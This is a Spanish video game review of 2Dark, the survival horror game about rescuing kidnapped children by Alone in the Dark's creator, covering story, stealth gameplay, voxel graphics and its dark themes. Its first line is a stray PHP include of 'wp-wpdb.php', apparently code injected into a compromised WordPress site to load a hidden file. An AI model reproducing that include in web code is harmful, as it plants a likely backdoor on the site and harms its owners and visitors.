if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis 2Dark, lo último del creador de Alone in the Dark – La Fortaleza de LeChuck

Análisis 2Dark, lo último del creador de Alone in the Dark

2Dark es el último trabajo de Frederick Raynal, creador de Alone in the Dark, aquel survival horror que nos adentraba en la terrorífica mansión Derceto. Después de un tiempo inactivo, Raynal vuelve a la carga con un nuevo survival repleto de elementos siniestros y temas considerados tabú.

Siguiendo el camino del Survival Horror

Alone in the Dark fue el pionero del Survival Horror. El juego de Infogrames nos invitó a conocer los misterios de una escalofriante mansión junto a Edward Carnby y Emily Hartwood en una estupenda historia que bebía de la obra de H.P. Lovecraft. A pesar de los grandes polígonos que harían temblar a cualquier millenial hoy, fue un juego que marcó a toda una generación y provocó la producción de juegos de la talla de Resident Evil o Silent Hill. Alone in the Dark tuvo secuelas que fueron perdiendo el brillo del juego original hasta llegar a lanzar películas de dudoso gusto.

Derceto, hogar dulce hogar

Después de Alone in the Dark, Raynal se desvinculó del género y nos sorprendió con Little Big Adventure, la mágica aventura de Twinsen por un mundo dominado por un tirano. Un puñado de títulos le siguieron pero la vuelta al género que le dio la fama seguía sin llegar a pesar de sus intentos, como el de Agartha, un survival horror que tenía previsto su lanzamiento para Dreamcast pero que, lamentablemente, fue cancelado. Tras varios años apartado del mundillo, Raynal lanzó el crowdfunding de 2Dark, su regreso al survival horror.

¡Salva a los niños!

2Dark da inicio con un prólogo que relata el pasado del protagonista. El detective Smith estaba disfrutando de un fin de semana de acampada junto a su familia. Sin embargo, su felicidad queda truncada en el momento en el que su mujer e hijos abandonan la zona para ir a buscar leña. Unos minutos más tarde, los gritos de sus seres queridos le sobresaltan. Cuando llega al lugar encuentra a su mujer brutalmente asesinada y a sus hijos alejándose en el interior de un autobús. Han pasado 7 años desde aquel horrible incidente y Smith se niega a olvidar, lo ha dejado todo para investigar las extrañas desapariciones de niños en GroomyWood con la esperanza de que le lleven hasta sus pequeños.

2Dark es un Survival Horror con tintes sangrientos y situaciones perturbadoras que se tornan menos duras por su aspecto desenfadado. En cada uno de los seis niveles veremos como los niños sufren todo tipo de vejaciones y daremos con pruebas bastante explicitas. El objetivo de 2Dark es liberar a los niños de cada lugar y recopilar todas las pistas hasta completar las seis fases de las que consta el juego. A través de nuestro mapa de pruebas, iremos viajando a esos puntos para atraer a los niños con nuestras habilidades y así hacer que abandonen el lugar con vida.

Al acabar cada episodio, regresaremos a casa y pondremos todas las pruebas sobre la mesa para estudiar la relación de los sospechosos con el secuestro de niños hasta resolver el caso. La historia nos presentará a todo tipo de psicópatas y a sus compinches en un relato que recuerda al de viejas cintas policiacas donde el protagonista se obsesionaba con la investigación hasta el punto de poner en peligro su vida.

Para sobrevivir a los niveles de 2Dark es necesario recoger objetos y utilizarlos en lugares indicados para así desbloquear puertas o completar pequeños puzles que nos permitirán avanzar. Para interactuar con los objetos, tan solo hemos de acercarnos lo suficiente, lo mismo si deseamos dialogar con algún individuo. El juego permite equipar dos objetos a la vez, siempre y cuando sean de una mano: un bate y una linterna, la pistola y una llave… Continuamente tendremos que ir cambiando de objetos dependiendo de la situación con la que nos topemos.

Los niveles de 2Dark tienen enemigos por doquier, trampas de todo tipo y sorpresas desagradables que pueden poner fin a nuestra partida. El uso de linternas y otros objetos que den luz nos ayudará a observar allí donde pisemos, pero estos objetos consumen energía y tendremos que encontrar recambios. Las localizaciones por las que nos moveremos son muy originales, tenemos un circo, un gran edificio de oficinas, un hospicio… Todos estos lugares son una tapadera para oscuros planes y explorarlos a fondo será tan emocionante como terrorífico. Me gustó especialmente el bloque de oficinas, en cada planta me topaba con habitaciones curiosas y individuos de todo tipo que me ofrecían varias formas de acercarme a mi objetivo.

Algunos personajes no hostiles nos echarán una mano para liberar a los niños

El sigilo será fundamental para ahorrarnos disgustos, ya que la munición es limitada y quizá lo más inteligente sea ignorar al rival o ir silenciosamente por la espalda y asestarle un leñazo que lo tumbe de un golpe. Por otro lado, algunos individuos no serán hostiles y simplemente aportarán información sobre el lugar.

Los personajes de las diferentes fases tienen una rutina especial que si la estudiamos detenidamente puede beneficiarnos. Por ejemplo, hay un nivel con una gran cantidad de perros asesinos, y si vamos como un kamikaze a por ellos posiblemente no viviremos lo suficiente para contarlo, o nos quedaremos sin munición, pero si observamos los movimientos de los enemigos, veremos que en algún momento ejecutan una acción que podemos reproducir para avanzar sin perder balas. Hay muchas formas de resolver el juego y en ocasiones la prueba-error será vital para comprender cual es la mejor forma de avanzar.

En algunos niveles nuestro inventario se ampliará hasta límites insospechados

Como he indicado unas líneas más arriba, el objetivo principal es salvar a los niños y hallar pruebas incriminatorias. Muchos críos estarán encerrados o en situaciones difíciles, una vez que estén liberados de sus ataduras, podremos atraerles con caramelos o levantarlos como sacos de patatas al hombro hasta la salida. Las pistas que necesitamos para nuestra investigación estarán en los lugares más recónditos, así que mejor no dejarse un rincón sin registrar. Sin embargo, si nos retrasamos mucho algunos niños pueden morir y saltarnos el temido game over, o hacer que no consigamos la máxima puntuación en el nivel. Hay que estar atentos a los diálogos de los NPCs del episodio, ya que aportarán continuamente pistas y detalles de la historia.

Al terminar el nivel, se nos puntuará con estrellas dependiendo de nuestro buen hacer. Las posibilidades para completarlo son diversas, pero cuanto más discretos y efectivos seamos más estrellas ganaremos. El modo desafío permitirá que volvamos a repetir el nivel escogido para hacernos con un mayor número de estrellas.

Gráficos y ambientación

2Dark es un juego de vista isométrica y utiliza gráficos voxel, una forma sencilla y poco frecuente de crear el apartado gráfico, y que, además, mitiga la cruda ambientación. Los personajes y objetos se modelan en voxels, en 3D, pero se representan como píxeles 2D utilizando una técnica propia.

En el juego, cada objeto, que sería un sprite en un clásico juego 2D, es renderizado por un «sombreador voxel», que utiliza la misma iluminación volumétrica que los fondos. Para editar los personajes en voxels y verlos inmediatamente renderizados en píxeles, Frederick creó el Gloomy Voxel Editor, el cual regaló a los backers en determinadas recompensas.

Visualmente, 2Dark es un juego macabro que se mete en temas escabrosos como el canibalismo y el secuestro y tortura de niños, un contenido que no encontramos ni siquiera en juegos políticamente incorrectos como GTA, y solo un pequeñísimo número de títulos tocan de refilón. El aura retro que envuelve al juego y el humor negro, hace que el impacto visual sea menor, pero no ocurrirá lo mismo en la cabeza del jugador, que puede reproducir mediante la imaginación esas escenas perturbadoras y sentirse realmente incómodo. Personalmente, la parte que más me impactó fue cuando en las noticias emitieron una serie de imágenes grotescas de cuerpos de niños en bandejas. Sin duda, no apto para sensibles.

La música del juego está en consonancia con el arte y las escenas desagradables tras el pequeño manto humorístico. Escucharemos canciones oscuras que recuerdan a nanas infantiles y temas que reforzarán la ambientación de terror del título.

Vigila donde pisas

2Dark es la vuelva de un veterano al survival horror con un juego insólito, sencillo y adictivo que revolverá en ocasiones nuestras tripas con imágenes rocambolescas y situaciones de auténtica pesadilla. Los puzles y el misterio se dan cita en este juego tan divertido como original con un final que quizá no satisfaga nuestras expectativas pero el recorrido por los niveles será suficiente para disfrutar del título.